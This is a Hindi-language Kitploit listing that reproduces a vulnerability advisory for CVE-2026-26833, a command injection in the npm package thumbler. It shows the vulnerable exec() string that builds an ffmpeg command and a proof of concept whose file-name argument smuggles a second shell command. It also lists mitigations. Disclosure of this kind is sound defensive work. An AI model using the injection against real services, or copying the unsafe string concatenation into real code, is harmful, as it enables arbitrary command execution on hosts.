Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-26833 — Advisory for thumbler | Kitploit
उपकरण/GitHubGitHub/zebberncve/cve-2026-26833
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & Education
GitHubzebberncve/cve-2026-26833

CVE-2026-26833

Advisory for thumbler

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2026-26833: थंबलर में OS कमांड इंजेक्शन

सारांश

thumbler संस्करण 1.1.2 तक lib/thumbler.js में thumbnail() में OS कमांड इंजेक्शन की अनुमति देता है। पैकेज input, output, time, और size मानों को एक एकल ffmpeg कमांड स्ट्रिंग में जोड़ता है और उस स्ट्रिंग को child_process.exec() के साथ निष्पादित करता है। एक हमलावर जो उन मानों में से किसी एक को नियंत्रित करता है, शेल सिंटैक्स इंजेक्ट कर सकता है और मनमाने कमांड चला सकता है।

प्रभावित उत्पाद

ProductAffected versionsFixed version
thumbler1.1.2 तक के सभी संस्करण2026-03-24 तक कोई फिक्स उपलब्ध नहीं

भेद्यता विवरण

  • CVE ID: CVE-2026-26833
  • CWE: CWE-78 - OS कमांड इंजेक्शन
  • CVSS 3.1: 9.8 (गंभीर)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • प्रभावित घटक: lib/thumbler.js, thumbnail()

कमजोर कोड पथ निम्नलिखित शेल स्ट्रिंग का निर्माण करता है:

root@kitploit:~
exec(
  'ffmpeg -ss ' + time + ' -i "' + input + '" -vframes 1 -s ' +
  size + ' "' + output + '"',
  ...
);

चूंकि कमांड को एक स्ट्रिंग के रूप में असेंबल किया जाता है, प्रत्येक हमलावर-नियंत्रित फ़ील्ड एक संभावित इंजेक्शन बिंदु है।

तकनीकी प्रभाव

कोई भी सेवा जो उपयोगकर्ता-नियंत्रित मीडिया से थंबनेल उत्पन्न करती है, thumbnail() को कॉल करते समय होस्ट पर कमांड निष्पादित कर सकती है।

प्रूफ ऑफ कॉन्सेप्ट

root@kitploit:~
require("thumbler").thumbnail(
  'test.mp4"; id > /tmp/pwned; echo "',
  "/tmp/out.jpg",
  {},
  () => {}
);

शमन

लेखन के समय कोई फिक्स्ड npm रिलीज़ उपलब्ध नहीं है।

यदि आप अभी भी इस पैकेज पर निर्भर हैं:

  1. thumbnail() में अविश्वसनीय डेटा पास न करें।
  2. शेल-स्ट्रिंग संयोजन को तर्क-सुरक्षित प्रक्रिया निष्पादन से बदलें।
  3. एक रखरखाव वाले थंबनेल जनरेशन लाइब्रेरी या एक फिक्स्ड फोर्क पर जाएँ।

संदर्भ

  • https://www.npmjs.com/package/thumbler
  • https://github.com/mmahrous/thumbler
  • https://github.com/mmahrous/thumbler/blob/master/lib/thumbler.js
टूल डाउनलोड करें